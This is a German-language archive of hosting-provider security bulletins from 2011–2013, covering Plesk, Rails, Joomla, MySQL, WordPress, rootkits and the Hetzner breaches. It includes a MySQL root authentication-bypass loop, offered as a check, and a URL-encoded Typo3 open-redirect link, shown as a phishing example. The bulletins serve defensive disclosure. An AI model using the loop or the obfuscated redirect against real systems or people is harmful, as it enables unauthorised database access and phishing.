Project homepage: https://pki.net.in.tum.de PLEASE NOTE: scheduled downtime until at least 3 September 2013

If you find we disturb your network activities, please accept our apologies and drop us a note to blacklist certain systems by replying to this mail. We promise we respond to every complaint, and we are happy to blacklist systems with annoyed admins.

If you have any further questions, or hints where we can improve, we would be happy to hear from you.

Best regards, Ralph Holz Franz Saller




SB 13.13 :: DDoS - Attacke auf Github

2013.08.16

Zwischen 16:00 und 22:00 Uhr war Github aufgrund eines DDoS-Angriffs zeitweise nicht mehr erreichbar.

Weitere Informationen auf status.github.com.




SB 13.12 :: Joomla-Lücke erlaubt beliebigen Dateiupload

2013.08.13

Bereits am 01.08.2013 veröffentlichten die Joomla_Entwickler ein Advisory[1], indem auf eine kritische Sicherheitslücke hingewiesen wird, mit denen unberechtigte Dateiuploads möglich sind; betroffen sind 2.5.13 und frühere 2.5.x Versionen sowie 3.1.4 frühere 3.x Versionen.

Nach Aussage von Brian Krebs sind auch alle Versionen der mittlerweile nicht mehr supporteten Reihe 1.X davon betroffen[2].

Betreiber von Joomla-Seiten sollten umgehend die Webpräsenzen updaten.

  1. http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads
  2. http://krebsonsecurity.com/2013/08/simple-hack-threatens-oudated-joomla-sites



SB 13.11 :: Wichtige Hetzner Online Kundeninformation / Hetzner-Robot womöglich kompromittiert

2013.06.06

Folgende Nachricht erreichte uns vor kurzem von Hetzner, die wir hier ungekürzt weitergeben mit dem Hinweise, bitte umgehend die Hetzner-Robot-Passwörter zu ändern

Ende letzter Woche haben Hetzner-Techniker eine "Backdoor" in einem unserer internen Überwachunssysteme (Nagios) entdeckt.

Die sofort eingeleiteten Untersuchungen zeigten, dass auch die Verwaltungs- oberfläche für dedizierte Server (Robot) davon betroffen war. Aktuelle Erkenntnisse legen den Schluss nahe, dass Fragmente unserer Kundendatenbank nach extern kopiert wurden.

Infolge dessen müssen wir derzeit die bei uns im Robot hinterlegten Kundendaten als kompromittiert betrachten.

Der von uns entdeckte Schädling ist nach unserem Kenntnisstand bisher unbekannt und noch nicht in Erscheinung getreten.

Der im Backdoor eingesetzte Schadcode setzt sich ausschließlich im Arbeitsspeicher fest. Eine erste Analyse lässt vermuten, dass der Schadcode direkt im laufenden Apache- und sshd-Prozess eingeschleust wird. Dabei werden weder die Binaries des kompromittierten Dienstes modifiziert, noch wird der betroffene Dienst durch die Infektion neu gestartet.

Übliche Analysetechniken, wie das Prüfen von Checksummen oder Tools wie "rkhunter" können die Schadsoftware deshalb nicht aufspüren.

Zur detaillierten Analyse des Vorgangs haben wir eine externe Sicherheitsfirma beauftragt, unsere eigenen Administratoren zu unterstützen. Zum jetzigen Stand sind die Analysen über den Vorgang noch nicht abgeschlossen.

Die Zugangspasswörter für Ihren Robot-Kundenaccount werden als Hash (SHA256) unter Verwendung eines Salt in unserer Datenbank abgelegt. Zur Sicherheit empfehlen wir, Ihre Kundenpasswörter im Robot auszutauschen.

Bei Kreditkarten werden in unseren Systemen nur die letzten 3 Ziffern der Kartennummer, der Kartentyp und das Ablaufdatum der Karte gespeichert. Alle anderen Kartendaten werden ausschließlich von unserem Zahlungsdienstleister gespeichert, und über eine Pseudokartennummer referenziert. Deshalb sind nach unserem bisherigen Kenntnisstand keine Kreditkartendaten kompromittiert.

Hetzner-Techniker arbeiten permanent daran, mögliche Sicherheitslücken zu lokalisieren und zu unterbinden sowie unsere Systeme und Infrastruktur so sicher wie möglich zu halten. Das Thema Datenschutz hat für uns eine sehr hohe Priorität. Um die Aufklärung weiter voranzutreiben, haben wir diesen Vorfall der zuständigen Datenschutzbehörde gemeldet.

Darüber hinaus stehen wir bezüglich dieses Vorfalls mit dem Bundeskriminalamt in Kontakt.

Selbstverständlich werden wir Sie bei neuen Erkenntnissen umgehend informieren.

Wir bedauern den Vorfall außerordentlich und bedanken uns für Ihr Verständnis und Ihr Vertrauen.

Sollten Sie Fragen dazu haben, so werfen Sie bitte einen Blick auf unsere speziell dafür eingerichtete FAQ-Seite unter http://wiki.hetzner.de/index.php/Security_Issue

Mit freundlichen Grüßen

Martin Hetzner




SB 13.10 :: Plesk Apache Zeroday Remote Exploit - Update 2

2013.06.05

Update 2: Parallels bestätigt ein einem Advisory[9] die Lücke für die Plesk-Version 9.0-9.2.3 und gibt einen Workaround für Plesk-Admins heraus, die nicht auf aktuelle Versionen updaten können.

Update 1: nach eigener Analyse konnten nur sehr wenige angreifbare Systeme gefunden werden (2 von 100 getesteten). Die meisten Plesk-Installationen antworteten mit einem Error 404, einige wenige mit Error 502; dies deckt sich mit Kommentaren auf Fulldisclosure und Reddit [7,8]

Der für seine Exploits bekannte Hacker kingcope [3-6] hat auf Fulldisclosure einen Remote-Exploit für die Administrationssoftware Plesk[2] veröffentlicht[1], mit dem beliebige OS-Befehle mit Rechten des Webserver-Users ausgeführt werden können.

Diese massive Sicherheitslücke entsteht durch eine sehr unglückliche PHP-Standardkonfiguration des Apache-Webservers und ist damit remote sehr einfach ausnutzbar.

Betroffen sind laut Kingcope die Plesk-Versionen 9.5.4, 9.3, 9.2, 9.0 und 8.6, getestet auf Linux-Systemen; die Version 11 ist nicht angreifbar

Updates oder Workarounds sind bisher nicht verfügbar.

  1. Plesk Apache Zeroday Remote Exploit by kingcope
  2. Parallels Plesk Panel
  3. SSH Tectia Remote Authentication Bypass
  4. MySQL (Linux) Database Privilege Elevation Zeroday Exploit
  5. IBM System Director Remote System Level Exploit
  6. BSD telnetd Remote Root Exploit
  7. Files from Kingcope @ packetstorm
  8. Re: Plesk Apache Zeroday Remote Exploit
  9. Reddit-Kommentare
  10. Parallels Plesk Panel: PHP-CGI remote code execution vulnerability (CVE-2012-1823)



SB 13.09 :: MongoDB Remote Code Execution II

2013.06.05

2013-06-05

Nach dem ersten Fund einer RCE-Schwachstelle in MongoDB[2] legen die SCRT-Forscher nach und veröffentlichen eine 2te Schwachstelle[1], die womöglich auch eine RCE ermöglichen. Ein funktionierender Eploit oder POC kann demnächst erwartet werden.

Da MongoDB per se keine Sicherheitsfeatures oder Zugriffsrestriktionen bietet, wird betreibern von MongoDB-Installationen dringend geraten, die Datenbank-Server per Firewall und IP-Restriktion zu schützen und den offenen Zugriff auf MongoDB zu beschränken.

MongoDB wird mittlerweile von Shodan indiziert und bietet damit ei n ideales Ziel für Hacker, die ein Botnetz aufbauen wollen.

  1. SCRT-Blog "mongodb – RCE by databaseSpraying"
  2. SCRT-Blog "mongodb – SSJI to RCE"
  3. Reddit-Shodan-Kommentar



SB 13.08 :: RubyOnRails - Exploits aufgetaucht

2013.05.28

2013-05-28

Für die im Januar[1] aufgetauchte Lücke im Rails-Framework sind Exploits in the wild beobachtet worden[2,3], die die Remote-Code-Execution dazu nutzen, den jeweiligen Server mit einem IRC-Client zu versehen und in ein Botnet zu integrieren.

In einem Blogartikel werden weitere Details der Angriffe, Gegenmaßnahmen und Möglichkeiten der Erkennung näher erläutert.

  1. SecurityBulletin 13.02
  2. Reddit - Eintrag: Found in my crontab - what is it?
  3. Github-Diskussion
  4. WGET / Crontab - Hacks: RubyOnRails-Exploits in the wild



SB 13.07 :: Brute-Force - Angriffe auf Wordpress

2013.04.16

2013-04-12

Weltweit berichten Hoster über Angriffe auf bei ihnen betriebene Installationen des Blog-Programms Wordpress. In einem Blog-Beitrag von Host Gator heißt es, man habe Zugriffe von mehr als 90.000 verschiedenen IP-Adressen registriert, und auch das Content Delivery Network Cloudflare stellte solche Aktivitäten fest, die vermutlich von einem Botnet ausgehen. Der Sicherheitsdienstleister Sucuri bestätigte eine Zunahme der Anmeldeversuche im April 2013 um das Dreifache. Am gestrigen Freitag hatten auch deutsche Hoster über Angriffen auf Wordpress- und Joomla-Installationen informiert. Leser haben ebenfalls über wiederholte Login-Versuche bei Wordpress von immer denselben IP-Adressen berichtet.

Nutzer von Wordpress sollten für den Verwaltungszugang ein sicheres, mindestens acht Zeichen langes Passwort festlegen. Außerdem sollten sie für dieses Konto nicht den voreingestellten Namen admin verwenden. Des weiteren kann man den wp-admin-Bereich via HTACCESS schützen, sollte die Lösung aber umfassend testen.

1) Original-Artikel auf heise.de
2) http://blog.hostgator.com/2013/04/11/global-wordpress-brute-force-flood/
3) http://blog.sucuri.net/2013/04/mass-wordpress-brute-force-attacks-myth-or-reality.html




SB 13.06 :: Update 1 / Upcoming PostgreSQL Security Release: April 4, 2013

2013.04.04

PostgreSQL 9.2.4, 9.1.9, 9.0.13 and 8.4.17 released

The PostgreSQL Global Development Group has released a security update to all current versions of the PostgreSQL database system, including versions 9.2.4, 9.1.9, 9.0.13, and 8.4.17. This update fixes a high-exposure security vulnerability in versions 9.0 and later. All users of the affected versions are strongly urged to apply the update immediately.

A major security issue fixed in this release, CVE-2013-1899, makes it possible for a connection request containing a database name that begins with "-" to be crafted that can damage or destroy files within a server's data directory. Anyone with access to the port the PostgreSQL server listens on can initiate this request. This issue was discovered by Mitsumasa Kondo and Kyotaro Horiguchi of NTT Open Source Software Center.




SB 13.06 :: Upcoming PostgreSQL Security Release: April 4, 2013

2013.04.02

The PostgreSQL Global Development Group will be releasing a security update for all supported versions on Thursday April 4th, 2013. This release will include a fix for a high-exposure security vulnerability. All users are strongly urged to apply the update as soon as it is available.

We are providing this advance notice so that users may schedule an update of their production systems on or shortly after April 4th.

As always, update releases only require installation of packages and a database system restart. You do not need to dump/restore or use pg_upgrade for this update release.

Postgres-Advisory




SB 13.05 :: SSH-Rootkit macht Schlagzeilen

2013.02.22

2013-02-22

Seit ca einer Woche findet im Webhostingtalk-Forum[1] eine rege Diskussion über eine bösartige Bibliothek statt, die auf einer Vielzahl von Systemen gefunden wurde und dafür sorgt, dass der betroffene Server Spam versendet, damit auf Blacklisten landet, und u.U. auch Logindaten mitsnifft und an fremde Systeme überträgt. Des weiteren soll es durch diese Bibliothek möglich sein, dass die Angreifer sich mit Rootrechten über SSH einloggen können, ohne dass dies in Logfiles auftaucht.[2]
Betroffen sind RedHat/CentOS basierte Systeme.
Beim ISC macht dieses Rootkit bereits Schlagzeilen: SSHD-Rootkit in the wild[3].

Es herrscht allerdings noch keine Sicherheit über den Infektionsweg; Andeutungen gibt es in Richtung Keylogger auf (windowsbasierten) Admin/Entwickler-Maschinen[4][5] oder Konfigurationstools wie cPanel/Plesk. Evtl. ist aber auch die Meldung über den versuchten Angriff auf Facebook-Entwickler von letzter Woche relevant[6]; es scheint sich seit einiger Zeit durchzusetzen, Admin/Entwicklermaschinen direkt anzugreifen, um Zugriff auf Server und Installationen zu erhalten.



1) Webhostingtalk-Forum
2) Archlinux-Board
3) ISC.sans.org
4) Post @ Webhostingtalk
5) Post @ Webhostingtalk
6) Angriff auf Facebook-Entwickler




SB 13.04 - UPnP-Lücke / weitere Rails-Lücke

2013.01.31

2013-01-31 Inhalt:

  • UPnP-Router weiterhin ungeschützt und angreifbar
  • weitere Rails-Lücke aufgetaucht

HD Moore veröffentlichte in einem Blogeintrag[1] das Ergebnis einer Studie eines globalen Scans nach UPnP-fähigen Routern; so wurden 40 Millionen Geräte gefunden, die über einen von 3 möglichen Wegen angreifbar sind und Zugriffe auf interne Systeme oder Missbrauch als Proxy ermöglichen. Dieses Ergebnis deckt sich mit Untersuchungen aus dem Jahr 2011. [2]

HD Moore will seine Ergebniss dem interessierten Publikum in einem Webcast am 4.2. präsentieren. [3]

Eine weitere Lücke wurde in Ruby on Rails gefunden und geschlossen, die die veralteten Versionen 2.3 und 3.0 betreffen; die aktuellen Versionen 3.1 und 3.2 sind davon nicht betroffen.[4,5] Die Lücke (CVE-2013-0333) betrifft diesmal den YAML-Parser und ermöglicht das Einschleusen von Code aus der Ferne und Auslesen von Dateien.



1) https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
2) http://www.heise.de/security/meldung/UPnP-faehige-Router-ermoeglichen-Angriff-aufs-LAN-1329633.html
3) http://information.rapid7.com/Webcast-UPnP-Registration.html?LS=1677495%20&CS=blog
4) http://weblog.rubyonrails.org/2013/1/28/Rails-3-0-20-and-2-3-16-have-been-released/
5) http://www.heise.de/security/meldung/Weitere-kritische-Luecke-in-Ruby-on-Rails-geschlossen-1793004.html




SB 13.02 - Rails-Lücke erlaubt SQL-Injection und Remote Code Execution (Update 1)

2013.01.25

Update 2013-01-24: das Ruby-Gem "multi_xml", das von verschiedenen Ruby-Anwendungen benutzt wird, ist durch die gleiche Lücke angreifbar, siehe [3]

Am 8.Januar wurde ein Advisory (CVE-2013-0156)[1] der Rails-Entwickler veröffentlicht, indem vor einer schwerwiegenden Lücke mit möglichen Sql-Injections oder Remote Code Execution gewarnt wird; gleichzeitig wurde ein Rails-Update online gestellt[2] mit dem dringenden Hinweis, sobald als möglich upzudaten.

Unter [3] haben wir weitere Infos und Links zu der Lücke sowie Workarounds und IDS/WAF - Signaturen zusammengefasst.

1) https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion

2) http://weblog.rubyonrails.org/2013/1/8/Rails-3-2-11-3-1-10-3-0-19-and-2-3-15-have-been-released/

3) http://dogtown.mare-system.de/CVE-2013-0156




SB 13.03 - Typo3-Feature erlaubt Missbrauch

2013.01.24

basierend auf einem Heise-Artikel[1] zum Missbrauch des Webauftritts der Bundesagentur für Arbeit und weiterführender Recherche sind wir auf eine unvorteilhafte Typo3-Standardeinstellung gestossen, die anscheinend eine Grosszahl an Webseiten betrifft und u.a. dazu führen kann, dass eine Typo3-basierte Webseite für Phishingzwecke missbraucht wird, da folgende Verschleierung möglich ist:

<a href="http://www.example.com/?jumpurl=%68%74%74%70%3A%2F%2F%77%77%77%2E%67%6F%6F%67%6C%65%2E%64%65%2F" target="_blank">http://www.example.com/?jumpurl=%68%74%74%70%3A%2F<br>%2F%77%77%77%2E%67%6F%6F%67%6C%65%2E%64%65%2F

(hinter der Verschleierung des Ziels steckt ein harmloser Redirect auf www.google.de)

Ein mögliches Szenario: Ein Angreifer schickt eine Mail mit einem vermeintlich interessanten Link an potentielle Opfer, hinter dem ein verschleierter Redirect steckt, über den dann versucht wird, die Computer der Angeschriebenen mit Schadsoftware zu infizieren oder Accountdaten zu stehlen.

Wenn dieses Feature massiv ausgenutzt wird besteht Gefahr für die entsprechende Webseite, von Virenscannern / Google Safebrowsing geblockt oder mit Warnhinweisen versehen zu werden. Der Schaden für die Reputation wäre enorm.

Typo3-Webmaster sollten dieses Feature überprüfen.

[1] http://www.heise.de/security/meldung/Phisher-missbrauchen-URL-Weiterleitung-der-Arbeitsagentur-1789786.html




SB 13.01 - mehrere Wordpress - Lücken

2013.01.02

2013-01-01

Inhalt:

  • Probleme in Wordpress-TotalCache ermöglichen das Auslesen von Passwörtern
  • Wordpress als Portscanner missbraucht

Durch eine am 24. Dezember veröffentlichte Lücke im Wordpress-Plugin TotalCache ist es Angreifern u.a. möglich, gecachte Datenbankabfragen auszulesen und womöglich an Admin/Userpasswörter zu gelangen. [1] Die Lücke wurde am 28.12. vom Autor des Plugins geschlossen [2,3]. Am 25.12. wurden Signaturen für Naxsi [4] und Snort/Suricata [5] von uns für die Lücke veröffentlicht.

Wordpress lässt sich u.U. dazu missbrauchen, über die Pingback-API andere Server zu scannen. Mit dem entsprechenden Post auf Bugtraq [6] wurde ein Script veröffentlicht, mit dem sich diese Lücke automatisiert ausnutzen lässt.

  1. http://seclists.org/fulldisclosure/2012/Dec/242
  2. http://seclists.org/fulldisclosure/2012/Dec/266
  3. https://wordpress.org/extend/plugins/w3-total-cache/changelog/
  4. https://groups.google.com/forum/?fromgroups=#!topic/naxsi-discuss/bPSKzypw85I
  5. http://lists.emergingthreats.net/pipermail/emerging-sigs/2012-December/021061.html
  6. http://seclists.org/bugtraq/2012/Dec/10



Security Bulletin 12.09 - Mehrere Exploits für MySQL und FreeSSH veröffentlicht

2012.12.03

2012-12-03

Der Hacker Kingcope hat am 1. Advent mehrere Exploits veröffentlicht [1,2], mit denen man auf MySQL unter Windows teilweise Rootrechte erlangen kann. 3 weitere Exploits[3,4,5] sorgen unter Linux dafür, das gültige User ihre Rechte ausweiten und Datenzugriff erhalten können.
Admins sollten ihre Systeme vor beliebigen Zugang von aussen schützen.



Ein veröffentlichter Exploit[6] richtet sich gegen den Tectia/FreSSHd-Server. Mit diesem Exploit ist es möglich, sich mit einem beliebigen Password anzumelden. Die beiden genannten Server kommen eher im Windows-Umfeld zum Einsatz, da bei Linux standardmässig OpenSSH zum Einsatz kommt.



[1] http://seclists.org/fulldisclosure/2012/Dec/2
[2] http://seclists.org/fulldisclosure/2012/Dec/8
[3] http://seclists.org/fulldisclosure/2012/Dec/4
[4] http://seclists.org/fulldisclosure/2012/Dec/5
[5] http://seclists.org/fulldisclosure/2012/Dec/6
[6] http://seclists.org/fulldisclosure/2012/Dec/12




Security Bulletin 12.08 - FreeBSD - Server kompromittiert / Ver(w)irrung um Linux-Rootkit

2012.11.21

2012-11-19

Inhalt ::
- FreeBSD-Infrastruktur kompromittiert
- Meldungen um Linux-Rootkit sorgen für Verwirrung

Am 17.11. meldete das FreBSD-Team[1] einen Einbruch auf mind. zwei Servern mittels eines gestohlenen SSH-Keys. Der Einbruch konnte bis zum 19. September zurückverfolgt werden. Nach näherer Analyse wurde festgestellt, dass keine Server des Core-Systems betroffen waren, sondern die Packages-Server von Drittanbietern.
Anwender, die zwischen dem 19.September und dem 17.November Packete/Updates von diesen Servern bezogen haben werden aufgefordert, die installierten Pakete zu überprüfen, da nicht ausgeschlossen werden kann, dass Pakete modifiziert wurden.
Weitere Informationen liefert der Link unter [1].

Eine Nachricht[2] auf Full-Disclosure über ein neu entdecktes Linux-Rootkit sorgte in den letzten Tagen für einige Verwirrung. Dabei handelt es sich um ein Kernel-Modul, welches ausgehenden HTTP-Traffic modifiziert und mittels schadhafter Iframes oder JavaScript versucht, Exploits bei den Besuchern der laufenden Websites auszuführen. Mehrere Nachrichtenportale[3][4] sprangen auf den Zug auf und brachten teils reisserische News, dabei ist insbesondere der Infektionsweg, mit dem das Rootkit auf den Server kam, bisher unbekannt.
Im Resultat ähnelt das Rootkit dem im September gefundenen[7] Apache-Modul, dass in den ausgehenden HTTP-Traffic bösartige Iframes injizierte.
Weitere Analysen des Rootkits sind bei Cloudstrike[5] und Securelist[6] zu finden.




[1] http://www.freebsd.org/news/2012-compromise.html
[2] http://seclists.org/fulldisclosure/2012/Nov/94
[3] Heise: Rootkit befällt Linux-Webserver
[4] http://www.theregister.co.uk/2012/11/21/powerful_linux_rootkit/
[5] Cloudstrike: HTTP iframe Injecting Linux Rootkit
[6] Securelist: New 64-bit Linux Rootkit Doing iFrame Injections
[7] http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/




Security Bulletin 12.07 - weithin ungepatchte Lücke in Magento erlaubt Auslesen von Dateien

2012.08.14

 2012-08-13 <br><br>

Inhalt:
:: weithin ungepatchte Lücke in Magento erlaubt Auslesen von Dateien

Am 05.Juli informierten die Magento-Entwickler[1] über eine Lücke in der verwendeten XMLRPC-Api, über die es möglich ist, beliebige Dateien auf dem Webserver zu lesen. Am 09.Juli stellten die Entwickler weitere Erläuterungen, Patches für die jeweiligen Versionen und Workarounds zur Verfügung.[2] Die Lücke in Magento und im zugrundeliegenden Zend-Framework wurde von SEC-Consult entdeckt und an die Magento-Entwickler weitergegeben.[3,4]
Seit dem 13.Juli sind Exploit-Anleitungen auf den einschlägigen Foren zu finden, mit denen sich die Lücke einfach ausnutzen lässt.
Die Agentur nakami lounge stellte am 13.August fest, dass eine Vielzahl von Magento-Shops weiterhin ungepatcht sind, und sich die Lücke ausnutzen lässt[5]; dies liegt u.a. an der fragwürdigen Policy der Magento-Entwickler, Advisories und Sicherheitspatches nicht via Mailinglist anzukündigen sondern im Magento-Blog[6]. Weiterhin fehlt eine Möglichkeit, die Updates/Security-Meldungen via RSS-Feed zu abonnieren.



  1. http://www.magentocommerce.com/blog/comments/important-security-update-zend-platform-vulnerability/
  2. http://www.magentocommerce.com/blog/update-zend-framework-vulnerability-security-update
  3. https://www.sec-consult.com/en/advisories.html#a85
  4. https://www.sec-consult.com/en/advisories.html#a86
  5. http://www.nakamilounge.de/blog/2012/08/zend-lucke-in-magento-offenbar-weitgehend-unbekannt-bei-shop-betreibern/
  6. http://www.magentocommerce.com/blog/



Security Bulletin 12.06 - Lücke in Exchange und Sharepoint erlaubt Remote Code Execution

2012.07.26

2012-07-25


Microsoft warnt in einem Advisory [1] vor einer Lücke, die in den Produkten Exchange 2007/20120 und Sharepoint dazu führen kann, dass fremder Code auf dem Server ausgeführt wird; um die Lücke auszunutzen reicht es, eine speziell präparierte Email an einen Exchange-Server zu senden.
Als Workaround für Exchange empfiehlt Microsoft, das Transkodieren von Attachments zu deaktivieren; für Sharepoint soll es reichen, das Advanced Filter Pack zu deaktivieren.
Die Lücke wird durch eine 3rd-Party-Library (Outside In von Oracle) verursacht; Oracle hat letzte Woche ein Patch für die betroffene Library herausgegeben [2].
Weitere Infos gibt es auf Heise [3]



[1] http://technet.microsoft.com/enus/security/advisory/2737111
[2] http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
[3] http://www.heise.de/security/meldung/Microsoft-warnt-vor-Oracle-Luecken-in-Exchange-und-Sharepoint-1652251.html




Security Bulletin 12.05 - Schaltsekunde sorgt für Serverabstürze

2012.07.01

2012-07-01

Die in der Nacht von Samstag auf Sonntag eingefügte Schaltsekunde [1][2] hat zu mehreren Servercrashes geführt, u.a. betroffen waren Reddit [3] und The Pirate Bay [4].
Ursache für die Abstürze sind wahrscheinlich Bugs im NTP-Daemon, der die Systemzeit mit Zeitservern abgleicht. Eine genauere Analyse des Problems finden sich auf Serverfault [5], YCombinator[6] und einem Post an die LKML[8].
Betroffen von dem Problem sind:

  • RedHat [7]
  • Debian 4/5
Andere Distributionen sind möglicherweise auch betroffen; nähere Informationen dazu liegen momentan nicht vor.



[1] ftp://hpiers.obspm.fr/iers/bul/bulc/bulletinc.43
[2] http://www.heise.de/newsticker/meldung/Verlaengertes-Wochenende-1629612.html
[3] http://twitter.com/redditstatus/status/219244389044731904
[4] https://forum.suprbay.org/showthread.php?tid=125071&pid=778249#pid778249
[5] http://serverfault.com/questions/403732/anyone-else-experiencing-high-rates-of-linux-server-crashes-during-a-leap-second
[6] http://news.ycombinator.com/item?id=4182642
[7] https://access.redhat.com/knowledge/articles/15145
[8] http://lkml.indiana.edu/hypermail/linux/kernel/1203.1/04598.html




Security Bulletin 12.04 - Mysql erlaubt beliebigen Zugang ohne Passwort

2012.06.12

2012-06-11

Inhalt:
- Mysql erlaubt beliebigen Zugang ohne Passwort


Sergei Golubchik, Security Coordinator beim MySQL - Fork MariaDBm hat auf der ossec - Mailingliste[1] einen Weg aufgezeigt, beliebigen root/admin - Zugang zu MySQl/MariaDB zu erhalten. Nicht betroffen sind Debian und RedHat/CentOS; angeblich ist Ubuntu 12.04 LTS betroffen [2].

Mit folgendem Codeschnipsel lässt sich bei lokalem Shellzugang überprüfen, ob ein MySQL - Server von der Lücke betroffen ist:
for i in seq 1 1000; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done


Weitere Infos sowie Gegenmaßnahmen werden unter [2] gelistet.



[1] http://seclists.org/oss-sec/2012/q2/493
[2] http://dogtown.mare-system.de/doku.php?id=research:updates:secbulletin1204-mysql-root-access




Security Bulletin 12.03 - Kritische Lücke lässt Ruby on Rails entgleisen

2012.06.04

2012-06-03

Die Ruby on Rails - Entwickler haben eine kritische Schwachstelle geschlossen, durch die ein Angreifer SQL-Befehle auf dem Datenbankserver ausführen kann. [1] Ein weiterer Fix betrifft eine Lücke in Active Record, durch die Angreifer Datenbankabfragen manipulieren können. [2][3]




[1] https://groups.google.com/group/rubyonrails-security/browse_thread/thread/7546a238e1962f59
[2] https://groups.google.com/group/rubyonrails-security/browse_thread/thread/f1203e3376acec0f
[3] http://www.heise.de/newsticker/meldung/Kritische-Luecke-laesst-Ruby-on-Rails-entgleisen-1588449.html




Security Bulletin 12.02 - Offene Lücke im PHP-CGI-Modus

2012.05.03

2012-05-03

Das US-CERT warnt vor einer kritischen PHP-Sicherheitslücke[1][2], mit der es möglich ist, Code auf dem betroffenen Server auszuführen. Betroffen sind Server, die PHP im CGI-Modus betreiben.[3]
Mit folgender ReWrite-Rule lässt sich ein Workaround implementieren:


RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]




[1] http://www.kb.cert.org/vuls/id/520827
[2] http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
[3] http://www.heise.de/security/meldung/Gefahr-durch-offene-PHP-Luecke-1567433.html




Security Bulletin 12.01 - 4 Jahre alte Lücke in Plesk wird aktiv ausgenutzt

2012.03.02

2012-03-02

Inhalt
::4 Jahre alte Lücke in Plesk wird aktiv ausgenutzt

Heise berichtet[1], dass eine kritische Sicherheitslücke in der Administrations-Software Plesk derzeit aktiv genutzt wird, um betroffene Server zu kompromittieren und Webseiten Schadcode unterzuschieben. Betroffen sind sowohl Windows- als auch Linuxversionen.

MARE system empfiehlt, Administrationsoberflächen grundsätzlich per htaccess vor unberechtigtem Zugriff zu schützen.




[1] http://www.heise.de/newsticker/meldung/Fehler-in-Admin-Software-Plesk-wird-aktiv-ausgenutzt-1446521.html




Security Bulletin # 11.06 Debian verbannt sun-java6

2011.12.14

2011-12-14

Inhalt
:: Debian verbannt sun-java6

In einem Newsletter [1] gibt das Debian-Projekt bekannt, dass, aufgrund von Lizenzänderungen seitens Oracle, das sun-java6-Paket nicht mehr in den Repos geführt wird und keine Updates mehr zur Verfügung gestellt werden. In den aktuellen Stable-Releases (lenny/squeeze) sind die Pakete noch zu finden, in der zukünftigen Stable-Version wheezy sind die Pakete bereits entfernt.
Als Migrationspfad bietet sich an, die jeweils aktuellen Java-Pakete direkt von Oracle [2] herunterzuladen und via eigenerstellter Pakete, Puppet o.ä. zu deployen
Unter [3] stellt MARE system weitere Infos bereit, sofern diese bekannt werden.

[1] http://www.debian.org/News/weekly/2011/15/#javarm
[2] http://www.java.com/en/download/
[3] http://dogtown.mare-system.de/doku.php?id=research:updates:secbulletin1106-debian-sun-java




Security Bulletin # 11.05 Datenleck bei Hetzner / Apache erlaubt Zugriffe auf interne Server / BEAST beats SSL

2011.10.07

2011-10-07

Inhalt:
:: Kundendatenleck bei Hetzner
:: Falsch konfigurierter Apache-Webserver erlaubt Zugriffe auf interne Systeme
:: BEAST beats SSL
:: Facebook vs Datenschützer - Updates



Der Webhoster Hetzner warnt seine Kunden, dass am Mittwoch (05.10.2011) ein "missbräuchlicher Zugriff" auf "Kundendaten der Hetzner Online Administrationssysteme" erfolgt sei.[1] Betroffen sind Kunden der Bereiche Webhosting, Managed Server, Domain Registration Robot, vServer. Alle Kunden, die über Logins zur konsoleH oder dem Hetzner-Robot verfügen werden aufgefordert, die Passwörter zu diesen Diensten umgehend zu ändern. Möglicherweise sind auch Kontodaten betroffen; es wird geraten, die Kontobewegungen in nächster Zeit genauer zu beobachten.
Martin Hetzner erläuterte gegenüber der iX, dass die Zugangsdaten von Shared-Hosting-Anwendern im Klartext zugänglich gewesen seien. Von den Passwörtern für die Rootserver-Verwaltung hätten jedoch ausschließlich kryptografische Prüfsummen vorgelegen. Auch solche Hash-Werte sind in fremden Händen jedoch ein Risiko, weil sich mit entsprechender Rechenleistung die dazugehörigen Passwörter errechnen lassen.[2]



Durch falsch konfigurierte mod_rewrite_Regeln im Apache-Webserver können entfernte Angreifer durch einen ReverseProxy-Bypass möglicherweise auf interne Systeme zugreifen.[3]



Juliano Rizzo und Thai Duong haben am 23. September auf der Sicherheitskonferenz ekoparty in Buenos Aires ein Tool namens BEAST (Browser Exploit Against SSL/TLS) vorgestellt, mit dem ein Angreifer im gleichen Netz via SSL übertragene Browsercookies abgreifen und entschlüsseln können soll. Eine Analyse des Problems nebst möglichen Workraounds haben wir unter [4] zusammengestellt.



Die endlose Geschichte "Facebook vs Datenschutz", dokumentiert unter [5], hat einige Updates erfahren.



[1] http://hetzner-status.de/#126
[2] http://www.heise.de/newsticker/meldung/Datenleck-bei-Hetzner-1356468.html
[3] http://www.contextis.com/research/blog/reverseproxybypass/
[4] http://dogtown.mare-system.de/beast_beats_ssl
[5] http://dogtown.mare-system.de/facebook_und_datenschutz




Security Bulletin # 11.04 Apachekiller, PHP, Facebook

2011.08.24

2011-08-24

Inhalt:
:: Apachekiller bringt Webserver zum Absturz
:: PHP 5.3.7 mit kaputter crypt() Funktion
:: ULD Schleswig-Holstein sagt Facebooks "I Like" Button den Kampf an




Auf der Full-Disclosure-Mailingliste ist ein Script (apachekiller.pl)[1] aufgetaucht, mitdem sich der Apache-Webserver innerhalb kurzer Zeit von einem PC mit DSL-Anschluss aus lahmlegen lässt. Ein Workaround [2] in Form von Rewrite-Rules wurde von uns getestet und auf alle MARE-System-Webserver ausgerollt.





In der vor wenigen Tagen veröffentlichten PHP-Version 5.3.7 ist ein schwerwiegender Fehler in der crypt() - Funktion entdeckt worden[3]; von einem Einsatz wird abgeraten. In der mittlerweile veröffentlichten Version 5.3.8 ist dieser Fehler behoben[4].





Das Kieler Unabhängige Landeszentrum für Datenschutz (ULD) sucht die Konfrontation mit Facebook. Es fordert in einer Mitteilung[5] alle Website-Betreiber in Schleswig-Holstein auf, ihre Fanpages bei Facebook und Social-Plug-ins wie den "Gefällt mir"-Button auf ihren Webseiten bis Ende September 2011 zu entfernen. Thilo Weichert, Leiter des ULD und Landesdatenschutzbeauftragter, droht mit Untersagungsverfügungen und Bußgeldern wegen Verstößen gegen geltendes Datenschutzgrecht.[6]




[1] http://seclists.org/fulldisclosure/2011/Aug/175
[2] http://seclists.org/fulldisclosure/2011/Aug/241
